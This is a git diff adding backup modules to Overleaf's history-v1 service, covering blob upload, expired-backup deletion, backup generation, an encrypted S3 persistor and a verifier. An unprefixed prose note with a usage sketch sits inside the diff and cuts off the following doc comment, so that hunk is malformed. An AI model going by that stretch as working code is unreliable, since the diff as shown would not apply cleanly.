diff --git a/services/history-v1/storage/lib/backupBlob.mjs b/services/history-v1/storage/lib/backupBlob.mjs
new file mode 100644
index 0000000..8ae1a6a
--- /dev/null
+++ b/services/history-v1/storage/lib/backupBlob.mjs
@@ -0,0 +1,251 @@
+// @ts-check
+import { backupPersistor, projectBlobsBucket } from './backupPersistor.mjs'
+import { GLOBAL_BLOBS, makeProjectKey, BlobStore } from './blob_store/index.js'
+import Stream from 'node:stream'
+import fs from 'node:fs'
+import Crypto from 'node:crypto'
+import assert from './assert.js'
+import { backedUpBlobs, projects } from './mongodb.js'
+import { Binary, ObjectId } from 'mongodb'
+import logger from '@overleaf/logger/logging-manager.js'
+import { AlreadyWrittenError } from '@overleaf/object-persistor/src/Errors.js'
+import metrics from '@overleaf/metrics'
+import zLib from 'node:zlib'
+import Path from 'node:path'
+
+const HIGHWATER_MARK = 1024 * 1024
+
+/**
+ * @typedef {import("overleaf-editor-core").Blob} Blob
+ */
+
+/**
+ * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor
+ */
+
+/**
+ * Increment a metric to record the outcome of a backup operation.
+ *
+ * @param {"success"|"failure"|"skipped"} status
+ * @param {"global"|"already_backed_up"|"none"} reason
+ */
+function recordBackupConclusion(status, reason = 'none') {
+  metrics.inc('blob_backed_up', 1, { status, reason })
+}
+
+/**
+ * Downloads a blob to a specified directory
+ *
+ * @param {string} historyId - The history ID of the project the blob belongs to
+ * @param {Blob} blob - The blob to download
+ * @param {string} tmpDir - The directory path where the blob will be downloaded
+ * @returns {Promise<string>} The full path where the blob was downloaded
+ */
+export async function downloadBlobToDir(historyId, blob, tmpDir) {
+  const blobStore = new BlobStore(historyId)
+  const blobHash = blob.getHash()
+  const src = await blobStore.getStream(blobHash)
+  const filePath = Path.join(tmpDir, `${historyId}-${blobHash}`)
+  try {
+    const dst = fs.createWriteStream(filePath, {
+      highWaterMark: HIGHWATER_MARK,
+      flags: 'wx',
+    })
+    await Stream.promises.pipeline(src, dst)
+    return filePath
+  } catch (error) {
+    try {
+      await fs.promises.unlink(filePath)
+    } catch {}
+    throw error
+  }
+}
+
+/**
+ * Performs the actual upload of the blob to the backup storage.
+ *
+ * @param {string} historyId - The history ID of the project the blob belongs to
+ * @param {Blob} blob - The blob being uploaded
+ * @param {string} path - The path to the file to upload (should have been stored on disk already)
+ * @param {CachedPerProjectEncryptedS3Persistor} persistor - The persistor to upload with
+ * @return {Promise<void>}
+ */
+export async function uploadBlobToBackup(historyId, blob, path, persistor) {
+  const md5 = Crypto.createHash('md5')
+  const filePathCompressed = path + '.gz'
+  let backupSource
+  let contentEncoding
+  let size
+  try {
+    if (blob.getStringLength()) {
+      backupSource = filePathCompressed
+      contentEncoding = 'gzip'
+      size = 0
+      await Stream.promises.pipeline(
+        fs.createReadStream(path, { highWaterMark: HIGHWATER_MARK }),
+        zLib.createGzip(),
+        async function* (source) {
+          for await (const chunk of source) {
+            size += chunk.byteLength
+            md5.update(chunk)
+            yield chunk
+          }
+        },
+        fs.createWriteStream(filePathCompressed, {
+          highWaterMark: HIGHWATER_MARK,
+        })
+      )
+    } else {
+      backupSource = path
+      size = blob.getByteLength()
+      await Stream.promises.pipeline(
+        fs.createReadStream(path, { highWaterMark: HIGHWATER_MARK }),
+        md5
+      )
+    }
+    const key = makeProjectKey(historyId, blob.getHash())
+    await persistor.sendStream(
+      projectBlobsBucket,
+      key,
+      fs.createReadStream(backupSource, { highWaterMark: HIGHWATER_MARK }),
+      {
+        contentEncoding,
+        contentType: 'application/octet-stream',
+        contentLength: size,
+        sourceMd5: md5.digest('hex'),
+        ifNoneMatch: '*',
+      }
+    )
+  } finally {
+    if (backupSource === filePathCompressed) {
+      try {
+        await fs.promises.rm(filePathCompressed, { force: true })
+      } catch {}
+    }
+  }
+}
+
+/**
+ * Converts a legacy (postgres) historyId to a mongo projectId
+ *
+ * @param {string} historyId
+ * @return {Promise<string>}
+ * @private
+ */
+async function _convertLegacyHistoryIdToProjectId(historyId) {
+  const project = await projects.findOne(
+    { 'overleaf.history.id': parseInt(historyId) },
+    { projection: { _id: 1 } }
+  )
+
+  if (!project?._id) {
+    throw new Error('Did not find project for history id')
+  }
+
+  return project?._id?.toString()
+}
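Note: together, downloadBlobToDir and backupBlob form the script-side flow: stage the blob on disk, then upload and record it. A hedged sketch under the assumption that BlobStore exposes a getBlob(hash) lookup; the history ID, hash, and tmp-dir handling are illustrative only:

import fs from 'node:fs'
import { BlobStore } from './storage/lib/blob_store/index.js'
import { downloadBlobToDir, backupBlob } from './storage/lib/backupBlob.mjs'

// Placeholder identifiers; real scripts read these from Mongo.
const historyId = '000000000000000000000042'
const blob = await new BlobStore(historyId).getBlob('<some blob hash>')
const tmpDir = await fs.promises.mkdtemp('/tmp/blob-backup-')
const tmpPath = await downloadBlobToDir(historyId, blob, tmpDir)
await backupBlob(historyId, blob, tmpPath)
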
+ *
+ * @param {string} projectId - projectId for a project (mongo format)
+ * @param {string} hash
+ * @return {Promise<void>}
+ */
+export async function storeBlobBackup(projectId, hash) {
+  await backedUpBlobs.updateOne(
+    { _id: new ObjectId(projectId) },
+    { $addToSet: { blobs: new Binary(Buffer.from(hash, 'hex')) } },
+    { upsert: true }
+  )
+}
+
+/**
+ * Determine whether a specific blob has been backed up in this project.
+ *
+ * @param {string} projectId
+ * @param {string} hash
+ * @return {Promise<*>}
+ * @private
+ */
+export async function _blobIsBackedUp(projectId, hash) {
+  const blobs = await backedUpBlobs.findOne(
+    {
+      _id: new ObjectId(projectId),
+      blobs: new Binary(Buffer.from(hash, 'hex')),
+    },
+    { projection: { _id: 1 } }
+  )
+  return blobs?._id
+}
+
+/**
+ * Back up a blob to the global storage and record that it was backed up.
+ *
+ * @param {string} historyId - history ID for a project (can be postgres format or mongo format)
+ * @param {Blob} blob - The blob that is being backed up
+ * @param {string} tmpPath - The path to a temporary file storing the contents of the blob.
+ * @param {CachedPerProjectEncryptedS3Persistor} [persistor] - The persistor to use (optional)
+ * @return {Promise<void>}
+ */
+export async function backupBlob(historyId, blob, tmpPath, persistor) {
+  const hash = blob.getHash()
+
+  let projectId = historyId
+  if (assert.POSTGRES_ID_REGEXP.test(historyId)) {
+    projectId = await _convertLegacyHistoryIdToProjectId(historyId)
+  }
+
+  const globalBlob = GLOBAL_BLOBS.get(hash)
+
+  if (globalBlob && !globalBlob.demoted) {
+    recordBackupConclusion('skipped', 'global')
+    logger.debug({ projectId, hash }, 'Blob is global - skipping backup')
+    return
+  }
+
+  try {
+    if (await _blobIsBackedUp(projectId, hash)) {
+      recordBackupConclusion('skipped', 'already_backed_up')
+      logger.debug(
+        { projectId, hash },
+        'Blob already backed up - skipping backup'
+      )
+      return
+    }
+  } catch (error) {
+    logger.warn({ error }, 'Failed to check if blob is backed up')
+    // We'll try anyway - we'll catch the error if it was backed up
+  }
+  // If we weren't passed a persistor for this project, create one.
+  // This will fetch the key from AWS, so it's preferable to use
+  // the same persistor for all blobs in a project where possible.
+ if (!persistor) { + logger.debug( + { historyId, hash }, + 'warning: persistor not passed to backupBlob' + ) + } + persistor ??= await backupPersistor.forProject( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + try { + logger.debug({ projectId, hash }, 'Starting blob backup') + await uploadBlobToBackup(historyId, blob, tmpPath, persistor) + await storeBlobBackup(projectId, hash) + recordBackupConclusion('success') + } catch (error) { + if (error instanceof AlreadyWrittenError) { + logger.debug({ error, projectId, hash }, 'Blob already backed up') + // record that we backed it up already + await storeBlobBackup(projectId, hash) + recordBackupConclusion('failure', 'already_backed_up') + return + } + // eventually queue this for retry - for now this will be fixed by running the script + recordBackupConclusion('failure') + logger.warn({ error, projectId, hash }, 'Failed to upload blob to backup') + } finally { + logger.debug({ projectId, hash }, 'Ended blob backup') + } +} diff --git a/services/history-v1/storage/lib/backupDeletion.mjs b/services/history-v1/storage/lib/backupDeletion.mjs new file mode 100644 index 0000000..ef50609 --- /dev/null +++ b/services/history-v1/storage/lib/backupDeletion.mjs @@ -0,0 +1,93 @@ +// @ts-check +import { callbackify } from 'util' +import { ObjectId } from 'mongodb' +import config from 'config' +import OError from '@overleaf/o-error' +import { db } from './mongodb.js' +import projectKey from './project_key.js' +import chunkStore from '../lib/chunk_store/index.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from './backupPersistor.mjs' + +const MS_PER_DAY = 24 * 60 * 60 * 1000 +const EXPIRE_PROJECTS_AFTER_MS = + parseInt(config.get('minSoftDeletionPeriodDays'), 10) * MS_PER_DAY +const deletedProjectsCollection = db.collection('deletedProjects') + +/** + * @param {string} historyId + * @return {Promise<boolean>} + */ +async function projectHasLatestChunk(historyId) { + const chunk = await chunkStore.getBackend(historyId).getLatestChunk(historyId) + return chunk != null +} + +export class NotReadyToDelete extends OError {} + +/** + * @param {string} projectId + * @return {Promise<void>} + */ +async function deleteProjectBackup(projectId) { + const deletedProject = await deletedProjectsCollection.findOne( + { 'deleterData.deletedProjectId': new ObjectId(projectId) }, + { + projection: { + 'deleterData.deletedProjectOverleafHistoryId': 1, + 'deleterData.deletedAt': 1, + }, + } + ) + if (!deletedProject) { + throw new NotReadyToDelete('refusing to delete non-deleted project') + } + const expiresAt = + deletedProject.deleterData.deletedAt.getTime() + EXPIRE_PROJECTS_AFTER_MS + if (expiresAt > Date.now()) { + throw new NotReadyToDelete('refusing to delete non-expired project') + } + + const historyId = + deletedProject.deleterData.deletedProjectOverleafHistoryId?.toString() + if (!historyId) { + throw new NotReadyToDelete( + 'refusing to delete project with unknown historyId' + ) + } + + if (await projectHasLatestChunk(historyId)) { + throw new NotReadyToDelete( + 'refusing to delete project with remaining chunks' + ) + } + + const prefix = projectKey.format(historyId) + '/' + await backupPersistor.deleteDirectory(chunksBucket, prefix) + await backupPersistor.deleteDirectory(projectBlobsBucket, prefix) +} + +export async function healthCheck() { + const HEALTH_CHECK_PROJECTS = JSON.parse(config.get('healthCheckProjects')) + if (HEALTH_CHECK_PROJECTS.length !== 2) { + throw new Error('expected 2 healthCheckProjects') + } + if 
(!HEALTH_CHECK_PROJECTS.some(id => id.length === 24)) { + throw new Error('expected mongo id in healthCheckProjects') + } + if (!HEALTH_CHECK_PROJECTS.some(id => id.length < 24)) { + throw new Error('expected postgres id in healthCheckProjects') + } + + for (const historyId of HEALTH_CHECK_PROJECTS) { + if (!(await projectHasLatestChunk(historyId))) { + throw new Error(`project has no history: ${historyId}`) + } + } +} + +export const healthCheckCb = callbackify(healthCheck) +export const deleteProjectBackupCb = callbackify(deleteProjectBackup) diff --git a/services/history-v1/storage/lib/backupGenerator.mjs b/services/history-v1/storage/lib/backupGenerator.mjs new file mode 100644 index 0000000..4c18929 --- /dev/null +++ b/services/history-v1/storage/lib/backupGenerator.mjs @@ -0,0 +1,152 @@ +/** + * Provides a generator function to back up project chunks and blobs. + */ + +import chunkStore from './chunk_store/index.js' + +import { + GLOBAL_BLOBS, // NOTE: must call loadGlobalBlobs() before using this + BlobStore, +} from './blob_store/index.js' + +import assert from './assert.js' + +async function lookBehindForSeenBlobs( + projectId, + chunk, + lastBackedUpVersion, + seenBlobs +) { + if (chunk.startVersion === 0) { + return // this is the first chunk, no need to check for blobs in the previous chunk + } + if (chunk.startVersion > 0 && lastBackedUpVersion > chunk.startVersion) { + return // the snapshot in this chunk has already been backed up + } + if ( + chunk.startVersion > 0 && + lastBackedUpVersion === chunk.startVersion // same as previousChunk.endVersion + ) { + // the snapshot in this chunk has not been backed up + // so we find the set of backed up blobs from the previous chunk + const previousChunk = await chunkStore.loadAtVersion( + projectId, + lastBackedUpVersion + ) + const previousChunkHistory = previousChunk.getHistory() + previousChunkHistory.findBlobHashes(seenBlobs) + } +} + +/** + * Records blob hashes that have been previously seen in a chunk's history. + * + * @param {Object} chunk - The chunk containing history data + * @param {number} currentBackedUpVersion - The version number that has been backed up + * @param {Set<string>} seenBlobs - Set to collect previously seen blob hashes + * @returns {void} + */ +function recordPreviouslySeenBlobs(chunk, currentBackedUpVersion, seenBlobs) { + // We need to look at the chunk and decide how far we have backed up. + // If we have not backed up this chunk at all, we need to backup the blobs + // in the snapshot. Otherwise we need to backup the blobs in the changes + // that have occurred since the last backup. + const history = chunk.getHistory() + const startVersion = chunk.getStartVersion() + if (currentBackedUpVersion === 0) { + // If we have only backed up version 0 (i.e. the first change) + // then that includes the initial snapshot, so we consider + // the blobs of the initial snapshot as seen. If the project + // has not been backed up at all then currentBackedUpVersion + // will be undefined. + history.snapshot.findBlobHashes(seenBlobs) + } else if (currentBackedUpVersion > startVersion) { + history.snapshot.findBlobHashes(seenBlobs) + for (let i = 0; i < currentBackedUpVersion - startVersion; i++) { + history.changes[i].findBlobHashes(seenBlobs) + } + } +} + +/** + * Collects new blob objects that need to be backed up from a given chunk. 
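+ *
+ * Hashes already recorded in seenBlobs are skipped, as are global blobs
+ * unless they have been demoted to per-project storage; the remaining
+ * hashes are resolved to Blob objects via blobStore.getBlobs().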
+ * + * @param {Object} chunk - The chunk object containing history data + * @param {Object} blobStore - Storage interface for retrieving blobs + * @param {Set<string>} seenBlobs - Set of blob hashes that have already been processed + * @returns {Promise<Object[]>} Array of blob objects that need to be backed up + * @throws {Error} If blob retrieval fails + */ +async function collectNewBlobsForBackup(chunk, blobStore, seenBlobs) { + /** @type {Set<string>} */ + const blobHashes = new Set() + const history = chunk.getHistory() + // Get all the blobs in this chunk, then exclude the seenBlobs and global blobs + history.findBlobHashes(blobHashes) + const blobsToBackup = await blobStore.getBlobs( + [...blobHashes].filter( + hash => + hash && + !seenBlobs.has(hash) && + (!GLOBAL_BLOBS.has(hash) || GLOBAL_BLOBS.get(hash).demoted) + ) + ) + return blobsToBackup +} + +/** + * Asynchronously generates backups for a project based on provided versions. + * @param {string} projectId - The ID of the project's history to back up. + * @param {number} lastBackedUpVersion - The last version that was successfully backed up. + * @yields {AsyncGenerator<{ chunkRecord: object, chunkToBackup: object, chunkBuffer: Buffer, blobsToBackup: object[] }>} + * Yields chunk records and corresponding data needed for backups. + */ +export async function* backupGenerator(projectId, lastBackedUpVersion) { + assert.projectId(projectId, 'bad projectId') + assert.maybe.integer(lastBackedUpVersion, 'bad lastBackedUpVersion') + + const blobStore = new BlobStore(projectId) + + /** @type {Set<string>} */ + const seenBlobs = new Set() // records the blobs that are already backed up + + const firstPendingVersion = + lastBackedUpVersion >= 0 ? lastBackedUpVersion + 1 : 0 + let isStartingChunk = true + let currentBackedUpVersion = lastBackedUpVersion + const chunkRecordIterator = chunkStore.getProjectChunksFromVersion( + projectId, + firstPendingVersion + ) + + for await (const chunkRecord of chunkRecordIterator) { + const { chunk, chunkBuffer } = await chunkStore.loadByChunkRecord( + projectId, + chunkRecord + ) + + if (isStartingChunk) { + await lookBehindForSeenBlobs( + projectId, + chunkRecord, + lastBackedUpVersion, + seenBlobs + ) + isStartingChunk = false + } + + recordPreviouslySeenBlobs(chunk, currentBackedUpVersion, seenBlobs) + + const blobsToBackup = await collectNewBlobsForBackup( + chunk, + blobStore, + seenBlobs + ) + + yield { chunkRecord, chunkToBackup: chunk, chunkBuffer, blobsToBackup } + + // After we generate a backup of this chunk, mark the backed up blobs as seen + blobsToBackup.forEach(blob => seenBlobs.add(blob.getHash())) + currentBackedUpVersion = chunkRecord.endVersion + } +} diff --git a/services/history-v1/storage/lib/backupPersistor.mjs b/services/history-v1/storage/lib/backupPersistor.mjs new file mode 100644 index 0000000..8f80e5f --- /dev/null +++ b/services/history-v1/storage/lib/backupPersistor.mjs @@ -0,0 +1,121 @@ +// @ts-check +import fs from 'node:fs' +import Path from 'node:path' +import _ from 'lodash' +import config from 'config' +import { SecretManagerServiceClient } from '@google-cloud/secret-manager' +import OError from '@overleaf/o-error' +import { + PerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} from '@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor.js' +import { HistoryStore } from './history_store.js' + +const persistorConfig = _.cloneDeep(config.get('backupPersistor')) +const { chunksBucket, deksBucket, globalBlobsBucket, projectBlobsBucket } = + 
config.get('backupStore') + +export { chunksBucket, globalBlobsBucket, projectBlobsBucket } + +function convertKey(key, convertFn) { + if (_.has(persistorConfig, key)) { + _.update(persistorConfig, key, convertFn) + } +} + +convertKey('s3SSEC.httpOptions.timeout', s => parseInt(s, 10)) +convertKey('s3SSEC.maxRetries', s => parseInt(s, 10)) +convertKey('s3SSEC.pathStyle', s => s === 'true') +// array of CA, either inlined or on disk +convertKey('s3SSEC.ca', s => + JSON.parse(s).map(ca => (ca.startsWith('/') ? fs.readFileSync(ca) : ca)) +) + +/** @type {() => Promise<string>} */ +let getRawRootKeyEncryptionKeys + +if ((process.env.NODE_ENV || 'production') === 'production') { + ;[persistorConfig.s3SSEC.key, persistorConfig.s3SSEC.secret] = ( + await loadFromSecretsManager( + process.env.BACKUP_AWS_CREDENTIALS || '', + 'BACKUP_AWS_CREDENTIALS' + ) + ).split(':') + getRawRootKeyEncryptionKeys = () => + loadFromSecretsManager( + persistorConfig.keyEncryptionKeys, + 'BACKUP_KEY_ENCRYPTION_KEYS' + ) +} else { + getRawRootKeyEncryptionKeys = () => persistorConfig.keyEncryptionKeys +} + +export const DELETION_ONLY = persistorConfig.keyEncryptionKeys === 'none' +if (DELETION_ONLY) { + // For Backup-deleter; should not encrypt or read data; deleting does not need key. + getRawRootKeyEncryptionKeys = () => new Promise(_resolve => {}) +} + +const PROJECT_FOLDER_REGEX = + /^\d{3}\/\d{3}\/\d{3,}\/|[0-9a-f]{3}\/[0-9a-f]{3}\/[0-9a-f]{18}\/$/ + +/** + * @param {string} bucketName + * @param {string} path + * @return {string} + */ +export function pathToProjectFolder(bucketName, path) { + switch (bucketName) { + case deksBucket: + case chunksBucket: + case projectBlobsBucket: + const projectFolder = Path.join(...path.split('/').slice(0, 3)) + '/' + if (!PROJECT_FOLDER_REGEX.test(projectFolder)) { + throw new OError('invalid project folder', { bucketName, path }) + } + return projectFolder + default: + throw new Error(`${bucketName} does not store per-project files`) + } +} + +/** + * @param {string} name + * @param {string} label + * @return {Promise<string>} + */ +async function loadFromSecretsManager(name, label) { + const client = new SecretManagerServiceClient() + const [version] = await client.accessSecretVersion({ name }) + if (!version.payload?.data) throw new Error(`empty secret: ${label}`) + return version.payload.data.toString() +} + +async function getRootKeyEncryptionKeys() { + return JSON.parse(await getRawRootKeyEncryptionKeys()).map( + ({ key, salt }) => { + return new RootKeyEncryptionKey( + Buffer.from(key, 'base64'), + Buffer.from(salt, 'base64') + ) + } + ) +} + +export const backupPersistor = new PerProjectEncryptedS3Persistor({ + ...persistorConfig.s3SSEC, + disableMultiPartUpload: true, + dataEncryptionKeyBucketName: deksBucket, + pathToProjectFolder, + getRootKeyEncryptionKeys, + storageClass: { + [deksBucket]: 'STANDARD', + [chunksBucket]: persistorConfig.tieringStorageClass, + [projectBlobsBucket]: persistorConfig.tieringStorageClass, + }, +}) + +export const backupHistoryStore = new HistoryStore( + backupPersistor, + chunksBucket +) diff --git a/services/history-v1/storage/lib/backupVerifier.mjs b/services/history-v1/storage/lib/backupVerifier.mjs new file mode 100644 index 0000000..14b84cd --- /dev/null +++ b/services/history-v1/storage/lib/backupVerifier.mjs @@ -0,0 +1,216 @@ +// @ts-check +import OError from '@overleaf/o-error' +import chunkStore from '../lib/chunk_store/index.js' +import { + backupPersistor, + chunksBucket, + projectBlobsBucket, +} from './backupPersistor.mjs' 
+import { Blob, Chunk, History } from 'overleaf-editor-core' +import { BlobStore, GLOBAL_BLOBS, makeProjectKey } from './blob_store/index.js' +import blobHash from './blob_hash.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import logger from '@overleaf/logger' +import path from 'node:path' +import projectKey from './project_key.js' +import streams from './streams.js' +import objectPersistor from '@overleaf/object-persistor' +import { getEndDateForRPO } from '../../backupVerifier/utils.mjs' + +/** + * @typedef {import("@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor.js").CachedPerProjectEncryptedS3Persistor} CachedPerProjectEncryptedS3Persistor + */ + +/** + * @param {string} historyId + * @param {string} hash + */ +export async function verifyBlob(historyId, hash) { + return await verifyBlobs(historyId, [hash]) +} + +/** + * + * @param {string} historyId + * @return {Promise<CachedPerProjectEncryptedS3Persistor>} + */ +async function getProjectPersistor(historyId) { + try { + return await backupPersistor.forProjectRO( + projectBlobsBucket, + makeProjectKey(historyId, '') + ) + } catch (err) { + if (err instanceof NotFoundError) { + throw new BackupCorruptedError('dek does not exist', {}, err) + } + throw err + } +} + +/** + * @param {string} historyId + * @param {Array<string>} hashes + * @param {CachedPerProjectEncryptedS3Persistor} [projectCache] + */ +export async function verifyBlobs(historyId, hashes, projectCache) { + if (hashes.length === 0) throw new Error('bug: empty hashes') + + if (!projectCache) { + projectCache = await getProjectPersistor(historyId) + } + const blobStore = new BlobStore(historyId) + for (const hash of hashes) { + const path = makeProjectKey(historyId, hash) + const blob = await blobStore.getBlob(hash) + if (!blob) throw new Blob.NotFoundError(hash) + let stream + try { + stream = await projectCache.getObjectStream(projectBlobsBucket, path, { + autoGunzip: true, + }) + } catch (err) { + if (err instanceof NotFoundError) { + throw new BackupCorruptedMissingBlobError('missing blob', { + path, + hash, + }) + } + throw err + } + const backupHash = await blobHash.fromStream(blob.getByteLength(), stream) + if (backupHash !== hash) { + throw new BackupCorruptedInvalidBlobError( + 'hash mismatch for backed up blob', + { + path, + hash, + backupHash, + } + ) + } + } +} + +/** + * @param {string} historyId + * @param {Date} [endTimestamp] + */ +export async function verifyProjectWithErrorContext( + historyId, + endTimestamp = getEndDateForRPO() +) { + try { + await verifyProject(historyId, endTimestamp) + } catch (err) { + // @ts-ignore err is Error instance + throw OError.tag(err, 'verifyProject', { historyId, endTimestamp }) + } +} + +/** + * + * @param {string} historyId + * @param {number} startVersion + * @param {CachedPerProjectEncryptedS3Persistor} backupPersistorForProject + * @return {Promise<any>} + */ +async function loadChunk(historyId, startVersion, backupPersistorForProject) { + const key = path.join( + projectKey.format(historyId), + projectKey.pad(startVersion) + ) + try { + const buf = await streams.gunzipStreamToBuffer( + await backupPersistorForProject.getObjectStream(chunksBucket, key) + ) + return JSON.parse(buf.toString('utf-8')) + } catch (err) { + if (err instanceof objectPersistor.Errors.NotFoundError) { + throw new Chunk.NotPersistedError(historyId) + } + if (err instanceof Error) { + throw OError.tag(err, 'Failed to load chunk', { historyId, startVersion }) + } + throw err + } +} + +/** + * @param 
{string} historyId
+ * @param {Date} endTimestamp
+ */
+export async function verifyProject(historyId, endTimestamp) {
+  const backend = chunkStore.getBackend(historyId)
+  const [first, last] = await Promise.all([
+    backend.getFirstChunkBeforeTimestamp(historyId, endTimestamp),
+    backend.getLastActiveChunkBeforeTimestamp(historyId, endTimestamp),
+  ])
+
+  const chunksRecordsToVerify = [
+    {
+      chunkId: first.id,
+      chunkLabel: 'first',
+      startVersion: first.startVersion,
+    },
+  ]
+  if (first.startVersion !== last.startVersion) {
+    chunksRecordsToVerify.push({
+      chunkId: last.id,
+      chunkLabel: 'last before RPO',
+      startVersion: last.startVersion,
+    })
+  }
+
+  const projectCache = await getProjectPersistor(historyId)
+
+  const chunks = await Promise.all(
+    chunksRecordsToVerify.map(async chunk => {
+      try {
+        return History.fromRaw(
+          await loadChunk(historyId, chunk.startVersion, projectCache)
+        )
+      } catch (err) {
+        if (err instanceof Chunk.NotPersistedError) {
+          throw new BackupRPOViolationChunkNotBackedUpError(
+            'BackupRPOviolation: chunk not backed up',
+            chunk
+          )
+        }
+        throw err
+      }
+    })
+  )
+  const seenBlobs = new Set()
+  const blobsToVerify = []
+  for (const chunk of chunks) {
+    /** @type {Set<string>} */
+    const chunkBlobs = new Set()
+    chunk.findBlobHashes(chunkBlobs)
+    let hasAddedBlobFromThisChunk = false
+    for (const blobHash of chunkBlobs) {
+      if (seenBlobs.has(blobHash)) continue // old blob
+      if (GLOBAL_BLOBS.has(blobHash)) continue // global blob
+      seenBlobs.add(blobHash)
+      if (!hasAddedBlobFromThisChunk) {
+        blobsToVerify.push(blobHash)
+        hasAddedBlobFromThisChunk = true
+      }
+    }
+  }
+  if (blobsToVerify.length === 0) {
+    logger.debug(
+      {
+        historyId,
+        chunksRecordsToVerify: chunksRecordsToVerify.map(c => c.chunkId),
+      },
+      'chunks contain no blobs to verify'
+    )
+    return
+  }
+  await verifyBlobs(historyId, blobsToVerify, projectCache)
+}
+
+export class BackupCorruptedError extends OError {}
+export class BackupRPOViolationError extends OError {}
+export class BackupCorruptedMissingBlobError extends BackupCorruptedError {}
+export class BackupCorruptedInvalidBlobError extends BackupCorruptedError {}
+export class BackupRPOViolationChunkNotBackedUpError extends OError {}
diff --git a/services/history-v1/storage/lib/backup_store/index.js b/services/history-v1/storage/lib/backup_store/index.js
new file mode 100644
index 0000000..da79447
--- /dev/null
+++ b/services/history-v1/storage/lib/backup_store/index.js
@@ -0,0 +1,212 @@
+const { Binary, ObjectId } = require('mongodb')
+const { projects, backedUpBlobs } = require('../mongodb')
+const OError = require('@overleaf/o-error')
+
+// List projects with pending backups older than the specified interval
+function listPendingBackups(timeIntervalMs = 0, limit = null) {
+  const cutoffTime = new Date(Date.now() - timeIntervalMs)
+  const options = {
+    projection: { 'overleaf.backup.pendingChangeAt': 1 },
+    sort: { 'overleaf.backup.pendingChangeAt': 1 },
+  }
+
+  // Apply limit if provided
+  if (limit) {
+    options.limit = limit
+  }
+
+  const cursor = projects.find(
+    {
+      'overleaf.backup.pendingChangeAt': {
+        $exists: true,
+        $lt: cutoffTime,
+      },
+    },
+    options
+  )
+  return cursor
+}
+
+// List projects that have never been backed up and are older than the specified interval
+function listUninitializedBackups(timeIntervalMs = 0, limit = null) {
+  const cutoffTimeInSeconds = (Date.now() - timeIntervalMs) / 1000
+  const options = {
+    projection: { _id: 1 },
+    sort: { _id: 1 },
+  }
+  // Apply limit if provided
+  if (limit) {
+    options.limit = limit
+  }
+  const cursor = projects.find(
+    {
'overleaf.backup.lastBackedUpVersion': null, + _id: { + $lt: ObjectId.createFromTime(cutoffTimeInSeconds), + }, + }, + options + ) + return cursor +} + +// Retrieve the history ID for a given project without giving direct access to the +// projects collection. + +async function getHistoryId(projectId) { + const project = await projects.findOne( + { _id: new ObjectId(projectId) }, + { + projection: { + 'overleaf.history.id': 1, + }, + } + ) + if (!project) { + throw new Error('Project not found') + } + return project.overleaf.history.id +} + +async function getBackupStatus(projectId) { + const project = await projects.findOne( + { _id: new ObjectId(projectId) }, + { + projection: { + 'overleaf.history': 1, + 'overleaf.backup': 1, + }, + } + ) + if (!project) { + throw new Error('Project not found') + } + return { + backupStatus: project.overleaf.backup, + historyId: `${project.overleaf.history.id}`, + currentEndVersion: project.overleaf.history.currentEndVersion, + currentEndTimestamp: project.overleaf.history.currentEndTimestamp, + } +} + +async function setBackupVersion( + projectId, + previousBackedUpVersion, + currentBackedUpVersion, + currentBackedUpAt +) { + // FIXME: include a check to handle race conditions + // to make sure only one process updates the version numbers + const result = await projects.updateOne( + { + _id: new ObjectId(projectId), + 'overleaf.backup.lastBackedUpVersion': previousBackedUpVersion, + }, + { + $set: { + 'overleaf.backup.lastBackedUpVersion': currentBackedUpVersion, + 'overleaf.backup.lastBackedUpAt': currentBackedUpAt, + }, + } + ) + if (result.matchedCount === 0 || result.modifiedCount === 0) { + throw new OError('Failed to update backup version', { + previousBackedUpVersion, + currentBackedUpVersion, + currentBackedUpAt, + result, + }) + } +} + +async function updateCurrentMetadataIfNotSet(projectId, latestChunkMetadata) { + await projects.updateOne( + { + _id: new ObjectId(projectId), + 'overleaf.history.currentEndVersion': { $exists: false }, + 'overleaf.history.currentEndTimestamp': { $exists: false }, + }, + { + $set: { + 'overleaf.history.currentEndVersion': latestChunkMetadata.endVersion, + 'overleaf.history.currentEndTimestamp': + latestChunkMetadata.endTimestamp, + }, + } + ) +} + +/** + * Updates the pending change timestamp for a project's backup status + * @param {string} projectId - The ID of the project to update + * @param {Date} backupStartTime - The timestamp to set for pending changes + * @returns {Promise<void>} + * + * If the project's last backed up version matches the current end version, + * the pending change timestamp is removed. Otherwise, it's set to the provided + * backup start time. 
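+ *
+ * Editor's illustration (hypothetical versions): with
+ * lastBackedUpVersion 42 and currentEndVersion 42, pendingChangeAt is
+ * removed ($$REMOVE); with currentEndVersion 45 it is set to backupStartTime.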
+ */ +async function updatePendingChangeTimestamp(projectId, backupStartTime) { + await projects.updateOne({ _id: new ObjectId(projectId) }, [ + { + $set: { + 'overleaf.backup.pendingChangeAt': { + $cond: { + if: { + $eq: [ + '$overleaf.backup.lastBackedUpVersion', + '$overleaf.history.currentEndVersion', + ], + }, + then: '$$REMOVE', + else: backupStartTime, + }, + }, + }, + }, + ]) +} + +async function getBackedUpBlobHashes(projectId) { + const result = await backedUpBlobs.findOne( + { _id: new ObjectId(projectId) }, + { projection: { blobs: 1 } } + ) + if (!result) { + return new Set() + } + const hashes = result.blobs.map(b => b.buffer.toString('hex')) + return new Set(hashes) +} + +async function unsetBackedUpBlobHashes(projectId, hashes) { + const binaryHashes = hashes.map(h => new Binary(Buffer.from(h, 'hex'))) + const result = await backedUpBlobs.findOneAndUpdate( + { _id: new ObjectId(projectId) }, + { + $pullAll: { + blobs: binaryHashes, + }, + }, + { returnDocument: 'after' } + ) + if (result && result.blobs.length === 0) { + await backedUpBlobs.deleteOne({ + _id: new ObjectId(projectId), + blobs: { $size: 0 }, + }) + } + return result +} + +module.exports = { + getHistoryId, + getBackupStatus, + setBackupVersion, + updateCurrentMetadataIfNotSet, + updatePendingChangeTimestamp, + listPendingBackups, + listUninitializedBackups, + getBackedUpBlobHashes, + unsetBackedUpBlobHashes, +} diff --git a/services/history-v1/storage/lib/batch_blob_store.js 